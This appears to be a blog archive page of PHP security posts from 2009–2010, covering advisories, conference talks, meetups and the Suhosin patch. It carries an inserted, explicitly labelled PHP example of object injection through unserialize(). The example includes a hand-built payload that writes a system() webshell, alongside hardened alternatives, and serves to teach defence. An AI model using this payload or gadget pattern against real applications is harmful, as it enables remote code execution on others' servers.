Archive for the ‘Security’ Category
Saturday, February 27th, 2010
I previously blogged a sneak preview of the Month of PHP Security which is a new initiative to improve security in the PHP ecosystem. Today the call for papers was released. Everyone from the PHP and security community is invited to produce quality articles/advisories about PHP security topics/bugs and submit ...
Posted in PHP, Security | 3 Comments »
Friday, February 19th, 2010
Three years ago the Hardened-PHP project organized the Month of PHP Bugs. During one month I disclosed more than 40 vulnerabilities in the PHP interpreter in order to improve the overall security of PHP. In the history of PHP this event has been one of a kind. But now, three ...
Posted in PHP, Security | 10 Comments »
Wednesday, December 9th, 2009
I released an important advisory about a remotely exploitable unserialize() vulnerability in Piwik today.
SektionEins GmbH
...
Posted in PHP, Security | 3 Comments »
Saturday, November 28th, 2009
My company SektionEins, which is specialised in web application security audits, consulting and trainings, has finished the English translation of the PHP Security Poster. This poster is sent out for free to interested PHP programmers (until out of stock). The poster is DIN A0 size and details the most ...
Posted in PHP, Security | 11 Comments »
Saturday, November 28th, 2009
At yesterday's RSS09 conference I gave a slightly different version of my "Shocking News in PHP Exploitation" talk. This time I disclosed for the first time how unserializing user input in Zend Framework based applications can result in direct remote PHP code execution.
The topics of my talk were
easy ways to ...
Posted in PHP, Security | No Comments »
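The talk excerpt above states that unserializing user input can lead directly to remote PHP code execution but does not show the mechanism. The following is an added example (not code from the original posts, from Zend Framework or from Piwik) of the general pattern behind that class of bug: `unserialize()` instantiates whatever class name appears in the attacker's bytes and PHP then runs that class's magic methods (`__wakeup()`, `__destruct()`, `__toString()`, ...) on attacker-controlled properties. The `TemplateCache` class, the cookie-loading functions, the target path and the payload are all constructed for illustration; the `allowed_classes` option used in the hardened variant exists only from PHP 7.0 on.

```php
<?php
// Added example: PHP object injection through unserialize() on untrusted input,
// and two hardened replacements. Everything here is constructed for illustration.

// A perfectly ordinary application class. It was never meant to be reachable from
// the network, but unserialize() will happily build one from a cookie.
class TemplateCache
{
    public $file;
    public $data;

    // Runs automatically when the object is freed, including objects that were
    // created by unserialize(). Both properties then come from the attacker.
    public function __destruct()
    {
        file_put_contents($this->file, $this->data);
    }
}

// Vulnerable pattern: application state is taken from a cookie and deserialized as-is.
function loadStateVulnerable(string $cookie)
{
    return unserialize($cookie);
}

// Hardened, PHP >= 7.0: refuse to instantiate any class. A serialized object becomes
// __PHP_Incomplete_Class, so no magic method of any application class is reached,
// and anything that is not the expected array is discarded.
function loadStateHardened(string $cookie): array
{
    $state = @unserialize($cookie, ['allowed_classes' => false]);
    return is_array($state) ? $state : [];
}

// Hardened, any PHP version: do not use PHP's native serialization for untrusted
// data at all. json_decode(..., true) only ever yields scalars and arrays.
function loadStateJson(string $cookie): array
{
    $state = json_decode($cookie, true);
    return is_array($state) ? $state : [];
}

// Build the attacker's cookie by hand as a string, so that no TemplateCache object
// exists until the vulnerable code unserializes it. The target path is a temp file
// here; in a real attack it would be a PHP file inside the document root.
function buildPayload(string $file, string $data): string
{
    return sprintf(
        'O:13:"TemplateCache":2:{s:4:"file";s:%d:"%s";s:4:"data";s:%d:"%s";}',
        strlen($file), $file, strlen($data), $data
    );
}

$target  = sys_get_temp_dir() . '/injected.php';            // constructed target
$payload = buildPayload($target, '<?php system($_GET["c"]); ?>');

// 1. Vulnerable: nothing in the application ever mentions TemplateCache here, yet the
//    file appears as soon as the unserialized object is freed and __destruct() runs.
loadStateVulnerable($payload);
echo "vulnerable path wrote file: ", var_export(file_exists($target), true), "\n";
@unlink($target);

// 2. Hardened: the same bytes yield no object, no __destruct(), no file.
var_dump(loadStateHardened($payload));                       // array(0) {}
echo "hardened path wrote file: ", var_export(file_exists($target), true), "\n";

// 3. Legitimate state still round-trips through both hardened loaders.
var_dump(loadStateHardened(serialize(['lang' => 'de'])));    // ['lang' => 'de']
var_dump(loadStateJson(json_encode(['lang' => 'de'])));      // ['lang' => 'de']
```

Two points a practitioner should take from this. First, the dangerous class does not have to be referenced anywhere near the `unserialize()` call; any class that is loaded or autoloadable at that moment is a candidate gadget, which is why large frameworks are such productive hunting grounds. Second, on PHP 5 (the version current when these posts were written) there is no `allowed_classes` option, so the only real fix is to never pass attacker-controlled bytes to `unserialize()` and to use a data-only format such as JSON for cookies and form fields instead.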
Saturday, November 28th, 2009
On 5th of November I gave a talk titled "Shocking News in PHP Exploitation" at the Power of Community hacking/security conference in Seoul, South Korea. Afterwards I uploaded my slides to this server but only distributed the link through Twitter. I totally forgot about announcing the slides in my blog.
The topics of ...
Posted in PHP, Security, korea | No Comments »
Wednesday, October 7th, 2009
I am pleased to announce that on Thursday, 22nd of October 2009, at 19:30 there will be the 10th CGNSec meetup in Cologne/Germany. The meeting takes place at Hallmackenreuther, Brüsseler Platz 9, 50674 Köln (Google Maps).
Everyone working in the field of information security is invited to attend. If you are attending ...
Posted in CGNSec, Security | No Comments »
Thursday, September 24th, 2009
This year I will return to Power of Community in Seoul and present a session about state-of-the-art exploitation of PHP applications and servers. Unlike my Syscan and Blackhat talks, I will also demonstrate how to find unusual code execution vulnerabilities and how to tunnel attacks through web ...
Posted in PHP, Security, korea | 3 Comments »
Monday, September 21st, 2009
I just wanted to announce that this Wednesday (23rd of September 2009) at 19:30 there will be the next CGNSec meetup in Cologne/Germany. The meeting takes place at Hallmackenreuther, Brüsseler Platz 9, 50674 Köln (Google Maps).
Everyone working in the field of information security is invited to attend. If you are ...
Posted in CGNSec, Security | No Comments »
Thursday, August 13th, 2009
Several weeks have passed since the release of PHP 5.3.0, and I haven't released a stable Suhosin Patch for PHP 5.3.0 yet. The reason for this was that I was away from my development machine with a half-ready new generation of the Suhosin Patch waiting to be ...
Posted in PHP, Security | 8 Comments »